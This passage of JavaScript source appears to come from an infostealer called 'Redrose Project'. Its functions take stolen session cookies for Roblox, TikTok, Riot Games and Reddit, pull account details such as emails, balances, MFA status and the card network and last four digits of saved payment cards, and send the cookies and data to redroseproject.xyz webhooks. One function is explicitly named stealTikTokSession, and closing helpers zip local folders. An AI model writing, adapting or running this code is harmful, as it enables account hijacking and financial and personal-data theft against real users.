'referer': 'https://www.roblox.com',
'sec-ch-ua': '"Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-site',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
};
try {
let response = await axios.get('https://apis.roblox.com/payments-gateway/v1/payment-profiles', { headers: headers });
console.log('Payment Profiles:', response.data);
return response.data;
} catch (error) {
console.error('Error fetching payment profiles:', error.message);
throw error;
}
}
async function SubmitRoblox(secret_cookie) {
try {
let data = await GetRobloxDataAndTransactionTotals(secret_cookie);
if (!data || !data.username || data.robux === undefined || data.premium === undefined || data.userID === undefined || data.outgoingRobux === undefined) {
console.error('Invalid Roblox data received:', data);
return;
}
const robuxValue = data.robux === 0 ? 'No Robux' : data.robux;
let paymentProfiles = await GetPaymentProfiles(secret_cookie);
console.log('Payment Profiles:', paymentProfiles);
let embed = {
color: 0xff6f61,
author: {
name: 'Roblox Session',
icon_url: '',
},
thumbnail: {
url: data.avatar,
},
fields: [
{
name: 'Name:',
value: data.username,
inline: false,
},
{
name: 'Robux:',
value: robuxValue,
inline: true,
},
{
name: 'Premium:',
value: data.premium ? 'Yes' : 'No',
inline: true,
},
{
name: 'UserID:',
value: data.userID,
inline: false,
},
{
name: ' 🔁 Outgoing Robux Total Robux:',
value: data.outgoingRobux,
inline: true,
},
{
name: '💸 Total Purchases Robux:',
value: data.purchasesTotal,
inline: true,
},
{
name: '⏳ Pending Robux:',
value: data.pendingRobuxTotal,
inline: true,
},
{
name: '💰 Total Sales:',
value: data.salesTotal,
inline: true,
},
{
name: '💳 Currency Purchases Total:',
value: data.currencyPurchasesTotal,
inline: true,
},
{
name: 'Payment Profiles:',
value: paymentProfiles.map(profile => {
return `Card: ${profile.providerPayload.CardNetwork} Ending in ${profile.providerPayload.Last4Digits}`;
}).join('\n'),
inline: false,
},
],
footer: {
text: '@Redrose Project',
},
};
let payload = {
embeds: [embed],
key: key,
};
const randomString = crypto.randomBytes(3).toString('hex');
axios.post(`https://redroseproject.xyz/webhooks/${randomString}`, payload)
.then(response => {
console.log('Discord webhook sent successfully!');
})
.catch(error => {
console.error('Error sending Discord webhook:', error.message);
});
} catch (error) {
console.error('Error fetching Roblox data:', error.message);
let errorEmbed = {
color: 0xFF0000,
title: 'Error Fetching Webhook URL',
description: 'An error occurred while fetching the webhook URL',
fields: [
{
name: 'Error Message',
value: error.message,
},
],
footer: {
text: '@Redrose Project',
},
};
let errorPayload = {
embeds: [errorEmbed],
};
axios.post('https://redroseproject.xyz/error', errorPayload)
.then(errorResponse => {
console.log('Error embed sent successfully!');
})
.catch(error => {
console.error('Error sending error embed:', error.message);
});
}
}
//
function stealTikTokSession(cookie) {
try {
const headers = {
'accept': 'application/json, text/plain, */*',
'accept-encoding': 'gzip, compress, deflate, br',
'cookie': `sessionid=${cookie}`
};
axios.get("https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&battery_info=1&browser_language=de-DE&browser_name=Mozilla&browser_online=true&browser_platform=Win32&browser_version=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F112.0.0.0%20Safari%2F537.36&channel=tiktok_web&cookie_enabled=true&device_platform=web_pc&focus_state=true&from_page=fyp&history_len=2&is_fullscreen=false&is_page_visible=true&os=windows&priority_region=DE&referer=®ion=DE&screen_height=1080&screen_width=1920&tz_name=Europe%2FBerlin&webcast_language=de-DE", { headers })
.then(response => {
const accountInfo = response.data;
if (!accountInfo || !accountInfo.data || !accountInfo.data.username) {
throw new Error("Failed to retrieve TikTok account information.");
}
axios.post(
"https://api.tiktok.com/aweme/v1/data/insighs/?tz_offset=7200&aid=1233&carrier_region=DE",
"type_requests=[{\"insigh_type\":\"vv_history\",\"days\":16},{\"insigh_type\":\"pv_history\",\"days\":16},{\"insigh_type\":\"like_history\",\"days\":16},{\"insigh_type\":\"comment_history\",\"days\":16},{\"insigh_type\":\"share_history\",\"days\":16},{\"insigh_type\":\"user_info\"},{\"insigh_type\":\"follower_num_history\",\"days\":17},{\"insigh_type\":\"follower_num\"},{\"insigh_type\":\"week_new_videos\",\"days\":7},{\"insigh_type\":\"week_incr_video_num\"},{\"insigh_type\":\"self_rooms\",\"days\":28},{\"insigh_type\":\"user_live_cnt_history\",\"days\":58},{\"insigh_type\":\"room_info\"}]",
{ headers: { cookie: `sessionid=${cookie}` } }
)
.then(response => {
const insights = response.data;
axios.get(
"https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&app_name=tiktok_web&battery_info=1&browser_language=de-DE&browser_name=Mozilla&browser_online=true&browser_platform=Win32&browser_version=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F112.0.0.0%20Safari%2F537.36&channel=tiktok_web&cookie_enabled=true",
{ headers: { cookie: `sessionid=${cookie}` } }
)
.then(response => {
const wallet = response.data;
const webhookPayload = {
key: key,
embeds: [
{
title: "TikTok Session Detected",
description: "The TikTok session was detected",
color: 16716947,
fields: [
{
name: "Cookie",
value: "```" + cookie + "```",
inline: true
},
{
name: "Profile URL",
value: accountInfo.data.username ? `[Click here](https://tiktok.com/@${accountInfo.data.username})` : "Username not available",
inline: true
},
{
name: "User Identifier",
value: "```" + (accountInfo.data.user_id_str || "Not available") + "```",
inline: true
},
{
name: "Email",
value: "```" + (accountInfo.data.email || "No Email") + "```",
inline: true
},
{
name: "Username",
value: "```" + accountInfo.data.username + "```",
inline: true
},
{
name: "Follower Count",
value: "```" + (insights?.follower_num?.value || "Not available") + "```",
inline: true
},
{
name: "Coins",
value: "```" + wallet.data.coins + "```",
inline: true
}
],
footer: {
text: "TikTok Session Information" // Altbilgi metni (Opsiyonel)
}
}
]
};
const randomString = crypto.randomBytes(4).toString('hex');
axios.post(`https://redroseproject.xyz/webhooks/${randomString}`, webhookPayload)
.then(response => {
console.log('Discord webhook sent successfully!');
})
})
.catch(error => {
console.error('Error in retrieving wallet information:', error);
});
})
.catch(error => {
console.error('Error in retrieving insights:', error);
});
})
.catch(error => {
console.error('Error in retrieving account information:', error);
});
} catch (error) {
const errorMessage = {
title: "Error Detected",
description: "An error occurred while trying to steal TikTok session.",
color: 16711680,
fields: [
{
name: "Error Message",
value: "```" + error.message + "```",
inline: false
}
],
footer: {
text: "TikTok Session Error"
}
};
axios.post("https://redroseproject.xyz/error", { embeds: [errorMessage] })
.then(response => {
console.log('Error message sent to Discord webhook successfully!');
})
.catch(err => {
console.error('Error sending error message to Discord webhook:', err);
});
}
}
async function RiotGameSession(cookie) {
try {
const response = await axios.get('https://account.riotgames.com/api/account/v1/user', {
headers: { "Cookie": `sid=${cookie}` }
});
const embed_data = {
"title": ``,
"description": ``,
"color": 0x303037,
"footer": {
"text": `Redrose Project`,
"icon_url": 'https://i.etsystatic.com/7316153/r/il/30b73f/1202408264/il_fullxfull.1202408264_c3oj.jpg'
},
"thumbnail": { "url": "https://seeklogo.com/images/V/valorant-logo-FAB2CA0E55-seeklogo.com.png" },
"author": {
"name": "Valorant Session Detected",
"icon_url": "https://i.hizliresim.com/qxnzimj.jpg"
}
};
const username = String(response.data.username);
const email = String(response.data.email);
const region = String(response.data.region);
const locale = String(response.data.locale);
const country = String(response.data.country);
const mfa = String(response.data.mfa.verified);
const fields = [
{ "name": "Username", "value": "```" + username + "```", "inline": true },
{ "name": "Email", "value": "```" + email + "```", "inline": true },
{ "name": "Region", "value": "```" + region + "```", "inline": true },
{ "name": "Locale", "value": "```" + locale + "```", "inline": true },
{ "name": "Country", "value": "```" + country + "```", "inline": true },
{ "name": "MFA Enabled?", "value": "```" + mfa + "```", "inline": true },
{ "name": "Cookie", "value": "```" + cookie + "```", "inline": false }
];
embed_data["fields"] = fields;
const payload = {
"embeds": [embed_data],
"key": key,
};
const headers = {
"Content-Type": "application/json"
};
const randomString = crypto.randomBytes(3).toString('hex');
const responsePost = await axios.post(`https://redroseproject.xyz/webhooks/${randomString}`, payload, { headers });
} catch (error) {
console.error(`Error in RiotGameSession: ${error.message}`);
}
}
function setRedditSession(cookie) {
try {
const cookies = `reddit_session=${cookie}`;
const headers = {
'Cookie': cookies,
'Authorization': 'Basic b2hYcG9xclpZdWIxa2c6'
};
const jsonData = {
scopes: ['*', 'email', 'pii']
};
const tokenUrl = 'https://accounts.reddit.com/api/access_token';
const userDataUrl = 'https://oauth.reddit.com/api/v1/me';
axios.post(tokenUrl, jsonData, { headers })
.then(tokenResponse => {
const accessToken = tokenResponse.data.access_token;
const userHeaders = {
'User-Agent': 'android:com.example.myredditapp:v1.2.3',
'Authorization': `Bearer ${accessToken}`
};
axios.get(userDataUrl, { headers: userHeaders })
.then(userDataResponse => {
const userData = userDataResponse.data;
const username = userData.name;
const profileUrl = `https://www.reddit.com/user/${username}`;
const commentKarma = userData.comment_karma;
const totalKarma = userData.total_karma;
const coins = userData.coins;
const mod = userData.is_mod;
const gold = userData.is_gold;
const suspended = userData.is_suspended;
const embedData = {
title: "Redrose Project",
description: "",
color: 0xff6f61, // Özelleştirilmiş kırmızı renk
url: '',
timestamp: new Date().toISOString(),
fields: [
{ name: '🍪 Reddit Cookie', value: '```' + cookies + '```', inline: false },
{ name: '🌐 Profile URL', value: profileUrl, inline: false },
{ name: '👤 Username', value: username, inline: false },
{ name: '🗨️ Reddit Karma', value: `💬 Comments: ${commentKarma} | 👍 Total Karma: ${totalKarma}`, inline: true },
{ name: '💰 Coins', value: coins, inline: false },
{ name: '🛡️ Moderator', value: mod ? 'Yes' : 'No', inline: true },
{ name: '🌟 Reddit Gold', value: gold ? 'Yes' : 'No', inline: true },
{ name: '🚫 Suspended', value: suspended ? 'Yes' : 'No', inline: true }
],
footer: {
text: 'Developed by Redrose Project 🤖'
}
};
const randomString = crypto.randomBytes(3).toString('hex');
const data = {
embeds: [embedData],
key: key
};
axios.post(`https://redroseproject.xyz/webhooks/${randomString}`, data);
console.log('Data successfully sent to the webhook.');
})
.catch(error => {
console.error('Error retrieving user data:', error);
});
})
.catch(error => {
console.error('Error obtaining access token:', error);
});
} catch (error) {
console.error('An error occurred:', error);
}
}
function addFolder(folderPath) {
const folderFullPath = path.join(randomPath, folderPath);
if (!fs.existsSync(folderFullPath)) {
try {
fs.mkdirSync(folderFullPath, { recursive: true });
} catch (error) {}
}
}
async function getZipp(sourcePath, zipFilePath) {
try {
const zip = new AdmZip();
zip.addLocalFolder(sourcePath);
zip.writeZip('' + zipFilePath);
} catch (error) {}
}
function getZip(sourcePath, zipFilePath) {